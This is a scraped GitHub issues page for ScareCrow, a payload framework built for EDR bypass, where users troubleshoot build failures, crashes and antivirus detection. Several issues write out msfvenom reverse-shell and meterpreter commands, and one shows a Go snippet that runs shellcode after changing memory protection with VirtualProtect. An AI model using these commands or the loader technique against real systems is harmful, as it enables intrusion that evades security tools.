optiv / scarecrow Goto Github PK

View Code? Open in Web Editor NEW

2.7K 75.0 492.0 5.11 MB

ScareCrow - Payload creation framework designed around EDR bypass.

Go 100.00%

scarecrow's People

Stargazers

Watchers

Forkers

binary1985 beerandgin rdsece leftp acknowledgehim gavz aloksaurabh cybersecops g3ksmithington audibleblink topotam blacktrace hatchetxuexi dviros gdraperi wha000tif bharadwajyas usama7628674 idkwim tanupat085 elephacking gsongx fuckup1337 gh0st0ne goowen https-github-com-lychhayly lychhayly bigbrobro ith4cker 0vhell daffodi1 toramanemre zha0 jack51706 titounkle gkfnf listenquiet vikyslenator iiiusky shadowce 0xtoast picheljitsu yashomer1994 solomonsklash blackhatethicalhacking myxss v4nyl jdelta1 zpaav crash0ver1d3 gitbigbodied fancysauced sesyi rakjong ykankaya p1ngfl0yd ondrik8 daydayup40 majid-derkaoui sec-js curtishoughton k79holm s0j0hn rajivraj 5l1v3r1 eshad weiwhy bahadirtmzr kkirsche thomasvdhd marciopocebon hello-xbugs bigbigx bravery9 sm00v isgasho roussafi-omar jeningogo tomyang9 dskho ferretking killvxk raystyle n1f2c3 jymcheong kungia09 yangfan6888 s3m73x crash0v3r1de windows1988 jmacko morpheusc dzordre jr69ss benheise papusingh2sms kibercthulhu kobbycyber triplekill freeide

scarecrow's Issues

Memory Protection (Feature Request)

Are you aware of the below?

https://github.com/mgeeky/ShellcodeFluctuation

It would be worth implementing into ScareCrow

redeclared in this block

ScareCrow_3.0_windows_amd64.exe -I c.bin -Loader binary -domain www.microsoft.com

Mythic Atlas Agent/Mythic

After creating in Mythic shellcode using Atlas agent, try to generate wrapper to it using scarecrow wrapper
getting this:
No payloads that can be included have been created yet.
What iam doing wrong

Missing some go modules apparently

I followed the installation instructions and am running into issues where it thinks I am missing things. See below. Any advice?

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open Word/Word.go: no such file or directory

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open lync/lync.go: no such file or directory

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open Outlook/Outlook.go: no such file or directory

Exception during code execution

Exception raised during execution of shellcode, shellcode was tested via different execution means and worked as expected.

Exception with resulting binary

When I create a binary (on kali):

./ScareCrow -I shellcode_x64.bin -Loader binary -domain google.com

and execute the binary on windows, I receive an exception:

`[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [] Create a Pointer on stack
[DEBUG] [] Loading shellcode into a string
[DEBUG] [] Copy Pointer's attributes
[DEBUG] [] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x1724fbb3000 0xc000090000
PC=0xc000090000

syscall.Syscall(0xc000090000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/OneDrive.go:202 +0x665
rax 0xc000090000
rbx 0xcdf920
rcx 0x0
rdi 0xb24fb23000
rsi 0xc000079e40
rbp 0xc000079de0
rsp 0xb24fdffd18
r8 0x0
r9 0x0
r10 0x0
r11 0x206
r12 0xffffffffffffffff
r13 0x2e
r14 0x2d
r15 0xaa
rip 0xc000090000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b`

ESET detecting latest version of ScareCrow

The latest version of ScareCrow is detected by ESET. I git cloned the repo today to test. See below:

How to create valid payloads?

I would like to thank you for providing such an complete framework and the research details at first!

Unfortunately, I was not able to create valid payloads with ScareCrow so far.
As an example, I tried the shellcode creation via msfvenom first:

msfvenom -p windows/x64/shell/bind_tcp LPORT=8888 -f raw -o ./Desktop/scarecrow-test/bind.bin -b '\x00'

msfvenom -p windows/x64/shell/bind_tcp LPORT=8888 EXITFUNC=thread -f raw -o ./Desktop/scarecrow-test/bind.bin -b '\x00'

Then I tried to use ScareCrow on it:

./ScareCrow -I ../bind.bin -Loader binary -domain microsoft.com -console

which succeeds in creating a binary loader. But the resulting exe is not working on an Windows box. The resulting debug output in console is:

[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0xda29d2b000 0xc000128000
PC=0xc000128000

runtime: unknown pc 0xc000128000
stack: frame={sp:0xc000119e30, fp:0x0} stack=[0xc000112000,0xc00011a000)
000000c000119d30:  0000000000000001  000000c000119d60
000000c000119d40:  000000000066bb98 <fmt.(*pp).free+184>  0100000000777000
000000c000119d50:  000001e7e9b993b0  0000000000000000
000000c000119d60:  0000000000000028  000001e7e9b907b0
000000c000119d70:  000000c00000aae0  000000c000082120
000000c000119d80:  000000000077f660  0000000000000000
000000c000119d90:  0000000000000000  00000000006e5280
000000c000119da0:  ffffffffffffffff  000000c000094500
000000c000119db0:  000000c000119ed8  0000000000000040
000000c000119dc0:  000000c000119e90  000000000069f180
000000c000119dd0:  000000000068e401 <main.printDebug+33>  000000c00000aae0
000000c000119de0:  0000000000000050  000000000068f7ce <main.NtProtectVirtualMemory+142>
000000c000119df0:  0000000000690050  000000c00000aae0
000000c000119e00:  0000000000000005  0000000000000005
000000c000119e10:  0000000000000000  0000000000000000
000000c000119e20:  000000c0000fcde0  000000c000119f78
000000c000119e30: <000000000068f2d9 <main.main+1593>  00000000006c0050
000000c000119e40:  ffffffffffffffff  000000c000094500
000000c000119e50:  000000c000119ed8  0000000000000040
000000c000119e60:  000000c000119e90  0000000000000000
000000c000119e70:  0000000000000000  000000c0000fcde0
000000c000119e80:  0000000000000002  0000000000000400
000000c000119e90:  0000000000000004  0000000000000540
000000c000119ea0:  0000000000000010  0000000000000012
000000c000119eb0:  0000000000000540  00000000000003e6
000000c000119ec0:  00000000006e5c20  0000000000000020
000000c000119ed0:  0000000000000021  0000000000002000
000000c000119ee0:  000000c0000fc990  000000c0000c5f18
000000c000119ef0:  000000000068e2ee <golang.org/x/sys/windows/registry.init+686>  000000c0000fc810
000000c000119f00:  00000000006c2647  0000000000000019
000000c000119f10:  000000c0000fc990  000000c0000c5f48
000000c000119f20:  000000c000094500  000000c000128800
runtime: unknown pc 0xc000128000
stack: frame={sp:0xc000119e30, fp:0x0} stack=[0xc000112000,0xc00011a000)
000000c000119d30:  0000000000000001  000000c000119d60
000000c000119d40:  000000000066bb98 <fmt.(*pp).free+184>  0100000000777000
000000c000119d50:  000001e7e9b993b0  0000000000000000
000000c000119d60:  0000000000000028  000001e7e9b907b0
000000c000119d70:  000000c00000aae0  000000c000082120
000000c000119d80:  000000000077f660  0000000000000000
000000c000119d90:  0000000000000000  00000000006e5280
000000c000119da0:  ffffffffffffffff  000000c000094500
000000c000119db0:  000000c000119ed8  0000000000000040
000000c000119dc0:  000000c000119e90  000000000069f180
000000c000119dd0:  000000000068e401 <main.printDebug+33>  000000c00000aae0
000000c000119de0:  0000000000000050  000000000068f7ce <main.NtProtectVirtualMemory+142>
000000c000119df0:  0000000000690050  000000c00000aae0
000000c000119e00:  0000000000000005  0000000000000005
000000c000119e10:  0000000000000000  0000000000000000
000000c000119e20:  000000c0000fcde0  000000c000119f78
000000c000119e30: <000000000068f2d9 <main.main+1593>  00000000006c0050
000000c000119e40:  ffffffffffffffff  000000c000094500
000000c000119e50:  000000c000119ed8  0000000000000040
000000c000119e60:  000000c000119e90  0000000000000000
000000c000119e70:  0000000000000000  000000c0000fcde0
000000c000119e80:  0000000000000002  0000000000000400
000000c000119e90:  0000000000000004  0000000000000540
000000c000119ea0:  0000000000000010  0000000000000012
000000c000119eb0:  0000000000000540  00000000000003e6
000000c000119ec0:  00000000006e5c20  0000000000000020
000000c000119ed0:  0000000000000021  0000000000002000
000000c000119ee0:  000000c0000fc990  000000c0000c5f18
000000c000119ef0:  000000000068e2ee <golang.org/x/sys/windows/registry.init+686>  000000c0000fc810
000000c000119f00:  00000000006c2647  0000000000000019
000000c000119f10:  000000c0000fc990  000000c0000c5f48
000000c000119f20:  000000c000094500  000000c000128800
rax     0xc000128000
rbx     0x0
rcx     0xc0000fcde0
rdi     0x1a29c03000
rsi     0xc000119da0
rbp     0xc000119f78
rsp     0xc000119e30
r8      0xc000119d98
r9      0xc000119e28
r10     0x0
r11     0x212
r12     0xffffffffffffffff
r13     0x3b
r14     0x3a
r15     0xaa
rip     0xc000128000
rflags  0x10246
cs      0x33
fs      0x53
gs      0x2b

I also tried to use Donut to create a x64 shellcode of an existing binary, as well as using dll as a Loader for ScareCrow for both generated shellcodes (msf and donut). Nothing worked so far for me.

Can you please give me more details on what kind of shellcode payload ScareCrow expects?
Maybe provide some examples in the documentation?

Many thanks

Feature Request: Output parameter

Hey man great work!

I would like to ask for a feature request when you find time and you want it as well :)

Feature: To add an output parameter that specifies the location of the final Payload/Loader on where it is going to be saved.

For example:
./ScareCrow ...... --output /home/user/Desktop/
(The user wants the final payload to be saved at the Desktop)

Thanks in advance,
Keep up the great work!

Injection compiling

Tried as well with disabling amsi,etw and sleep.

No bypass

Encrypted shellcode method does not bypass antiviruses.

HTA delivery failing with remote URL

When executing the HTA delivery file (for both control and excel loaders) passing a remote URL where the HTA file is hosted does nothing. On the other hand, if the HTA file is already located on disk, the shellcode is executed successfully.

Monitoring through Process Explorer for control, you can see that control.exe is spawned which then calls rundll32.exe. This never happens when a remote URL is passed instead.

HTA file generated via:
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader control -O loader.hta -delivery hta -url <url> -domain <domain>
OR
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader excel -O loader.hta -delivery hta -url <url> -domain <domain>

Control/Excel Loader executed via:
mshta.exe http://HOST/loader.hta --> does not work
mshta.exe C:\Windows\Tasks\loader.hta --> works

Feature Request: Add service as an output format

It'd be nice if there was a service binary option when building a payload that we can use with services.

hta delivery one liner - no output

Hello,

If I choose the delivery options (hta), the executable was generated, but the hta file and the one liner command (output?) is missing.

What am I missed?

Thanks!

Code signing certificate generation fails

Whenever i try to generate a binary it fails. I peaked at the code and saw that it fails at the point where the certificate is generated. I have tried it on an up to date kali linux and on a Debian 9 server.

The payload is generated with:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.197 LPORT=51251 -f raw > bin.raw

Tried multiple argument permutations.

Error:

└─$ /opt/ScareCrow/ScareCrow -I /home/kali/Desktop/bin.raw -domain axano.com  -Loader binary -delivery macro -url http://192.168.0.197/
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
        \/     \/     \/            \/        \/                      
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle. 
        Fear is a TEACHER. the first one you ever had.”

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6df56a]

goroutine 1 [running]:
ScareCrow/limelighter.GenerateCert(0x7ffe784ad450, 0x9)
        /opt/ScareCrow/limelighter/limelighter.go:56 +0x2ca
ScareCrow/limelighter.Signer(0x7ffe784ad450, 0x9, 0x0, 0x0, 0x0, 0x0, 0xc000448720, 0x7)
        /opt/ScareCrow/limelighter/limelighter.go:1040 +0x4c6
main.execute(0xc0000fa000, 0x76f099, 0x3)
        /opt/ScareCrow/ScareCrow.go:83 +0x63b
main.main()
        /opt/ScareCrow/ScareCrow.go:162 +0x906

FIXED

Hi, thanks for this awesome tool!

fixed thanks.

cmd.run() failed with exit status 1

failedtomakeexe.docx

when run makes random files onenote onedrive excel word, but never creates out file.

invalid line number' not building , i like to see this demon on duty,,'' i really need help from the farmily

go build ScareCrow.go

ScareCrow/Loader

/home/virginhybrid78/Downloads/ScareCrow-main/Struct/Struct.go:213: error: invalid export data for ‘Macro’: invalid line number
/home/virginhybrid78/Downloads/ScareCrow-main/Struct/Struct.go:212: error: invalid export data for ‘Macro’: invalid line number

Binar loader

Hi,

I generated shellcode for messagebox and used the loader binary to convert to exe with scarecrow.
successfully generated but it's not prompting for messagebox. seems there is an issue with binary loader.

Windows 10 bug

exec: "": executable file not found in %PATH%:
[+] Payload Compiled
[*] Signing mimosys.dll With a Fake Cert
2022/04/15 12:46:03 cmd.Run() failed with exit status 0xffffffff

I have downloaded osslsigncode and put it on path env to sign and i i'll give this error

not work on windows 10

Binary and dll payloads not working

Binary and dll payloads are not working with Covenant (that uses donut to generate shellcode).

The control .cpl payload works but it is flagged by 6 AVs, I was modifying the code base for ages tying to find the signatures, but it's a large code base.

Any ideas which bits of the code they are flagging? I noticed that random names are generated for every function and variable name in the Cryptor.

I tried running the dll payload with: rundll32 example.dll

DLL Refresher detection

Hello,

thank you for providing such a great framework! Amazing work.

Unfortunately, the DLL Refresher code is detected by some AV, for example: NOD32. Example command:

../ScareCrow/ScareCrow -I beacon-sourcepoint-test1.bin -Loader dll -etw -domain www.microsoft.com

When I disabled refreshing and ETW, the DLL bypasses NOD32 though. I tried modifying the Struct.go, but editing is pretty hard due to "variable set and unused" compilation error.

Any chance that you can implement ETW and Refresher functionality as reflected (encrypted) DLL files? My Goland skills cannot do that in this language :(

thanks
Rafal

Excel loader not working

Hi again,

as I played around with this great tool a little more, I found I could not get the Excel loader module to work.
I tried to create shellcode in two ways:

msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -o msf.bin -f raw

msfvenom -p windows/x64/meterpreter_bind_tcp LPORT=8888 -o msf.bin -f raw

Both worked flawlessly with other loaders (except the binary one).

When I create the payload via Excel loader module, I try to execute it via cscript as I saw a JavaScript file gets created.
Excel spawns with a unsafe file extension message but does not execute the resulting xll.

I saw the xll got created in AppData\temp so I copied it before closing Excel and tried to execute the DLL manually by the methods described in this gist:

https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52

Unfortunately none of them worked.

Windows version here is

Version 20H2 (OS Build 19042.746)

Excel version is:

Office Professional Plus 2019
Version 2102

No AVs are installed and Defender is turned off completely for testing here.

When attempting to use CS beacon64.bin as input for HTA output only JSfile() output is in file

Input:
./ScareCrow -I /root/tools/b64.bin -Loader wscript -O loader.hta -domain microsoft.com

b64.bin is default CobaltStrike RAW output bin file.

Output:

Thoughts:
Tested 3 times. File output only appears to show code from Structs.go JSfile() the code from HTA() does not appear in file. I could be using it wrong or something but I think the expected output would be using some of the HTA() code (at least for the html). Might help solve issue #19.

Interesting Output found during testing (file extension left blank):

Binary Mode Crashing on later versions of Go

`C:\Users\Admin\Desktop>test.exe
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [] Create a Pointer on stack
[DEBUG] [] Loading shellcode into a string
[DEBUG] [] Copy Pointer's attributes
[DEBUG] [] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0xffffffffffffffff 0x7ffcdc61d34d
PC=0x7ffcdc61d34d

runtime: unknown pc 0x7ffcdc61d34d
stack: frame={sp:0xc00006d2a8, fp:0x0} stack=[0xc00006c000,0xc00006e000)
000000c00006d1a8: 0000000000000200 0000000000000008
000000c00006d1b8: 0000000000000000 0000000000000110
000000c00006d1c8: 0000000000000100 0000000000000002
000000c00006d1d8: 0000000000a30000 000000c00006d2a1
000000c00006d1e8: 0000000000000011 00007ffcef6fb434
000000c00006d1f8: 0000000000140000 0000000000000000
000000c00006d208: 00007ffcdc687420 0000000000000002
000000c00006d218: 0000000000000001 0000000000a3e4d0
000000c00006d228: 0000000000000002 00007ffcef6cabec
000000c00006d238: 000000c000000000 0000000000000000
000000c00006d248: 0000000000000000 0000000000a3e490
000000c00006d258: 000000c00006d300 00007ffcef6caa97
000000c00006d268: 0000000000a3e490 00007ffcef713c70
000000c00006d278: 0000000000a3e490 0000001700000002
000000c00006d288: 000000000000018c 00007ffcdc687420
000000c00006d298: 000000a000000000 0000000000000000
000000c00006d2a8: <0000af6126a8b566 0000000000000000
000000c00006d2b8: 0000000000000000 00007ffcec65eced
000000c00006d2c8: 00000000000003f0 0000000000000000
000000c00006d2d8: 00007ffcdc687420 00007ffcef826448
000000c00006d2e8: 0000000000000000 00007ffcec65ec4b
000000c00006d2f8: 0000000000a3e490 0000af6126a8b576
000000c00006d308: 00007ffcdc687420 00007ffcdc5d7c01
000000c00006d318: 0000000000000190 000000000000001d
000000c00006d328: 000000c00006d360 0000000000000004
000000c00006d338: 000000c00006d368 0000000000000000
000000c00006d348: 000000c00006d3d8 00007ffcdc5adbd0
000000c00006d358: 0000000000000000 0000000000000000
000000c00006d368: 0000000000000000 00000000ef6ca3bf
000000c00006d378: 0000000000000000 0000000000000000
000000c00006d388: 000000c00006d3e1 00007ffcdc6118c1
000000c00006d398: 0000000000000000 0000000000000190
runtime: unknown pc 0x7ffcdc61d34d
stack: frame={sp:0xc00006d2a8, fp:0x0} stack=[0xc00006c000,0xc00006e000)
000000c00006d1a8: 0000000000000200 0000000000000008
000000c00006d1b8: 0000000000000000 0000000000000110
000000c00006d1c8: 0000000000000100 0000000000000002
000000c00006d1d8: 0000000000a30000 000000c00006d2a1
000000c00006d1e8: 0000000000000011 00007ffcef6fb434
000000c00006d1f8: 0000000000140000 0000000000000000
000000c00006d208: 00007ffcdc687420 0000000000000002
000000c00006d218: 0000000000000001 0000000000a3e4d0
000000c00006d228: 0000000000000002 00007ffcef6cabec
000000c00006d238: 000000c000000000 0000000000000000
000000c00006d248: 0000000000000000 0000000000a3e490
000000c00006d258: 000000c00006d300 00007ffcef6caa97
000000c00006d268: 0000000000a3e490 00007ffcef713c70
000000c00006d278: 0000000000a3e490 0000001700000002
000000c00006d288: 000000000000018c 00007ffcdc687420
000000c00006d298: 000000a000000000 0000000000000000
000000c00006d2a8: <0000af6126a8b566 0000000000000000
000000c00006d2b8: 0000000000000000 00007ffcec65eced
000000c00006d2c8: 00000000000003f0 0000000000000000
000000c00006d2d8: 00007ffcdc687420 00007ffcef826448
000000c00006d2e8: 0000000000000000 00007ffcec65ec4b
000000c00006d2f8: 0000000000a3e490 0000af6126a8b576
000000c00006d308: 00007ffcdc687420 00007ffcdc5d7c01
000000c00006d318: 0000000000000190 000000000000001d
000000c00006d328: 000000c00006d360 0000000000000004
000000c00006d338: 000000c00006d368 0000000000000000
000000c00006d348: 000000c00006d3d8 00007ffcdc5adbd0
000000c00006d358: 0000000000000000 0000000000000000
000000c00006d368: 0000000000000000 00000000ef6ca3bf
000000c00006d378: 0000000000000000 0000000000000000
000000c00006d388: 000000c00006d3e1 00007ffcdc6118c1
000000c00006d398: 0000000000000000 0000000000000190
rax 0x7ffcdca04800
rbx 0x0
rcx 0x190
rdi 0xc00006d398
rsi 0x0
rbp 0xc00006d388
rsp 0xc00006d2a8
r8 0xc00006d360
r9 0x4
r10 0x0
r11 0x246
r12 0x7ffcdc9bb558
r13 0x1
r14 0x1
r15 0x0
rip 0x7ffcdc61d34d
rflags 0x10212
cs 0x33
fs 0x53
gs 0x2b`

options not working

Hi,

Is it possible that the different Loaders and Delivery options don't work? I installed the dependencies and everything on Kali Linux and generated raw shellcode with msfvenom. The process of building a binary o dll finishes without errors but they never execute the payload. I'm using a windows x64 reverse shell generated with this command:

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows -f raw -o shellcode.bin LHOST=192.168.0.49 LPORT=443

the command executed to build the binary is:

./ScareCrow -I /root/Desktop/tests/payloads/shellcode.bin -delivery bits -domain www.microsoft.com

The delivery options do not generate the code to download and execute the payload, like the macros one.
The only option that actually worked and executed the reverse shell was the Control Panel applet. Nothing else works.

Also, when I examine the Digital Signature of the generated binary or dll or applet it says that it cannot be verified, unlike the screenshot you provided in the Readme file.

My go version is 1.15.3

Any ideas as to what might be wrong? Do I need to start from zero?

Thank you!

Error during payload compiling and after that during signing of a binary

Hi. Thank you for your great work! I am trying to get a Cobalt Strike beacon.exe thru Windows Defender but currently I get the two errors below. I attempt this on Kali 2021.3 in a virtual environment using version 2.3 of ScareCrow.

┌──(virtual_env_scarecrow)─(root💀kali)-[~/pentest/ScareCrow-2.3]
└─# ./ScareCrow -I beacon.exe -domain www.microsoft.com -injection "C:\Windows\System32\notepad.exe" -console

[] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[+] Process Injection Mode Enabled
[] Created Process: C:\Windows\System32\notepad.exe
[] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneDrive's Properties
[] Compiling Payload
exit status 2: # loader
./OneDrive.go:367:67: newline in string
./OneDrive.go:367:67: syntax error: unexpected newline, expecting comma or )
./OneDrive.go:2682:3: newline in string

[+] Payload Compiled
[*] Signing OneDrive.exe With a Fake Cert
2021/09/22 04:06:42 cmd.Run() failed with exit status 255

Macro delivery

For some reason macro fails! After generating loader and js file from msfvenom.bin shellcode
./ScareCrow -I msfvenom.bin -Loader excel
-domain some.tld -url http://some.com -sandbox -O file.js
Host file in server provided in payload, copy macro from ScareCrow adding it to Office 2013
Developper Macro! (As from shellcode it works when I execute cscript file.js i get shell access)
From proccess hacker i can actually see Exel contact server URL i provided, but no reverse shell created! Tried with excel and msiexec and wscript Loader, so I am assuming that i have made mistske somewhere!

help for one-liner

can you please post the command to generate a macro?

i have tried ./Scarecrow -I my.bin -Loader excel -domain www.youtube.com -url https://file.io

should I add the binary name after file.io?

thx for advance

Detected by AV

Payload is detected by defender as malicious and deleted

Windows defender catches ScareCrow generated payload

I created stageless meterpreter with msfvenom, then packed it as exe file with scarecrow, and windows defender is catching my exe file. Am I doing something wrong, or is ScareCrow already out of date?

Kind regards, Zahar

Newb payload generation/evasion question

Hello!

I'm finding that Windows Defender is gobbling each and every payload I throw from ScareCrow at it, and it feels like I'm doing something wrong. Hope you could sanity check my process? Fair warning: I'm not new to pentesting but new to Cobalt Strike and not very experienced with EDR bypass techniques. In fact, seeing this video on ScareCrow is what inspired me to finally buy Cobalt Strike!

Anyways, I start in Cobalt Strike:

Attacks > Packages > Payload Generator > picked my listener > chose output of "raw" > ticked the box for "Use x64 payload" > saved that to ScareCrow folder on Kali VM. I also tried Attacks > Packages > Windows Executable (S) to get the export as well.
From Kali VM, tried generating a variety of payloads from Scarecrow. They generate successfully with no errors.
From my Win 10 19041 box, tried firing the payloads in several ways (drag and drop directly to disk, fire with msbuild, fire with PowerShell, fire with rundll32, etc.) and Windows Defender happily gobbles them up.

I thought maybe it was just Defender getting wise to some of ScareCrow's shenanigans, but it looks like folks have no problem fooling Defender - at least as of this very recent blog post that I saw someone tweet.

Any ideas?

Thanks!
Brian

Does not build on windows which I already figured

windows ec2

Hello all please when i use ssm run command i get the results as failed with this screen.

Failed to run command : exit status 0xffffffff

Scarecrow not working with Mythic C2/atlas agent

Hello,
During testing of C2 frameworks and scarecrow I ran across interesting behavior when it came to the Mythic C2 atlas agent (https://github.com/MythicAgents/atlas)

When exporting an atlas agent executable, using donut to generate shellcode and then using scarecrow the new wrapped payload is successfully created. When executed this payload makes 1 callback to the C2 server and then ceases to run. I have tried a number of different combinations to attempt to understand the issue better:

atlas + confuserEx + donut + scarecrow = 1 callback then dead
atlas + donut + scarecrow = 1 callback then dead
atlas + CLRvoyance + scarecrow = 1 callback then dead
atlas + confuserEx + donut + DonutTest = working implant

in addition I tried another dotnet c2 framework
Covenant Grunt + confuserEx + donut + scarecrow = working implant.

I have tried binary and control loaders and I have used the console and no errors are generated at any point. I'm happy to try and other troubleshooting that anyone might recommend.

Thanks

Windows defender new sandbox

Windows defender have a new sandbox now, not executing any script on the system

cmd.Run() failed

Can you help me see what's wrong

?

EDR Bypass

Hello :)

Which EDR were you able to bypass ?

Best,
L

Cannot Generate Payload expected 'STRING', found '<<'

Thank you for the code and latest update, however, I could not generate exe on latest 4.0.

Raw payload generated by lastest CS

sudo ./ScareCrow -I ~/Downloads/beacon.bin -Loader control -domain www.microsoft.com -O test.exe

will gave me the following error message:

[*] Compiling Payload
exit status 1: go list error: exit status 1: inputs.go:8:1: expected 'STRING', found '<<'


[+] Payload Compiled

Each time run the command will pop a different file name, but same location, for example:

exit status 1: go list error: exit status 1: winsec.go:8:1: expected 'STRING', found '<<'
exit status 1: go list error: exit status 1: netfirewall.go:8:1: expected 'STRING', found '<<'

Thanks!!

exec: "": executable file not found in %PATH%:

hello, running this tool in a windows 10 box , with all the tools required, installed and setup them on the PATH variable of the system i get this error:

ccc is the raw generated payload with msfvenom

C:\temp\ScareCrow>ScareCrow.exe -I c:\temp\ccc -domain microsoft.com

/ / ____ _____ _______ ____ _ ___ __ ______ _ __
_____ _/ \ \ __ _/ __ / \ /_ __ / _ \ / / /
/ \ ___ / __ | | /\ /\ _| | ( <> ) /
/______ /___ >____ /| _ >______ /|| __/ /_/
/ / / / /
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”

[] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[] Creating an Embedded Resource File
[+] Created Embedded Resource File With Outlook's Properties
[] Compiling Payload
exec: "": executable file not found in %PATH%:
[+] Payload Compiled
[] Signing Outlook.exe With a Fake Cert
2021/02/15 16:29:44 cmd.Run() failed with exit status 4294967295

i cannot figured out which executable is not on the PATH.. anything i do wrong ? all the single tool is working and its on the PATH:

thanks

AV's detect the code

how i can optimize encryption to stay out from detection?

Invalid PKCS7 Data (Empty or Not Padded)

OS is Kali Linux 2021.2. Go version is go version go1.15.15 linux/amd64.

I'm using a Cobalt Strike payload generated using Attacks -> Packages -> Windows Executable (S), Raw, and checked x64.

I enter the command:

./ScareCrow -I payload.bin -Loader wscript -etw --url http://[redacted] -domain support.microsoft.com -delivery bits

I get the error:

2021/09/23 11:10:01 [-] Invalid PKCS7 Data (Empty or Not Padded)

I've tried different options and different domains and always get the same error. I also tried git pull origin main and ran through the documented installation steps and still get the same error.

Thanks

Previous declaration when using any other loader

Unable to find a resolution for this one. Any time I attempt to run using anything other than the default, it am presented an error from go I believe, relating to a previous declaration::

[*] Compiling Payload exit status 1: go list error: exit status 2: # igYzBjFwiyh ./tcpmon.go:10:3: base64 redeclared as imported package name /home/user/tools/ScareCrow/tcpmon/tcpmon.go:8:3: previous declaration

I didn't see this anywhere else, could it be a golang issue with the new version or something related to my current setup?

Thanks! And thank you for your work, it's fantastic.

cmd.Run() failed with exit status 0xffffffff

when I after step : [*] Signing Outlook.exe With a Fake Cert, then I got cmd.Run() failed with exit status 0xffffffff.
my env:
go version go1.17.1 windows/amd64

OpenSSL 3.0.0 7 sep 2021 (Library: OpenSSL 3.0.0 7 sep 2021)

osslsigncode 2.2, using:
OpenSSL 1.1.1k 25 Mar 2021 (Library: OpenSSL 1.1.1k 25 Mar 2021)
libcurl/7.78.0 OpenSSL/1.1.1k zlib/1.2.11

some question about the shellcode loader

hi, there are some codes I can't understand for this shellcode loader:
scarecrow execute shellcode like this way:

targetPtr := func(){
	}
	size := uintptr(len(shellcode))
	var old uint32
	windows.VirtualProtect(uintptr(unsafe.Pointer(&targetPtr)),size,windows.PAGE_EXECUTE_READWRITE,&old)

	*(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&shellcode))

	var old1 uint32
	windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])),size,windows.PAGE_EXECUTE_READWRITE,&old1)

	syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), 0, 0, 0, 0)

but I tried that the other way is work too and have less code:

	size := uintptr(len(shellcode))

	var old uint32

	windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])),size,windows.PAGE_EXECUTE_READWRITE,&old)

	syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), 0, 0, 0, 0)

and another way is worked but unreliable:

targetPtr := func(){
	}
	size := uintptr(len(shellcode))
	var old uint32
	windows.VirtualProtect(uintptr(unsafe.Pointer(&targetPtr)),size,windows.PAGE_EXECUTE_READWRITE,&old)

	*(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&shellcode))

	var old1 uint32
	windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])),size,windows.PAGE_EXECUTE_READWRITE,&old1)

	targetPtr()

runtime error when compiling payloads

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6b7193]

goroutine 1 [running]:
ScareCrow/limelighter.GenerateCert(0x7ffee0ffe6d3, 0x8)
	/home/jean/Documents/Tools/ScareCrow/limelighter/limelighter.go:49 +0x133
ScareCrow/limelighter.Signer(0x7ffee0ffe6d3, 0x8, 0x0, 0x0, 0x0, 0x0, 0xc000309100, 0x8)
	/home/jean/Documents/Tools/ScareCrow/limelighter/limelighter.go:1015 +0x5de
main.execute(0xc000012120, 0x73f3a9, 0x4)
	/home/jean/Documents/Tools/ScareCrow/ScareCrow.go:83 +0x63b
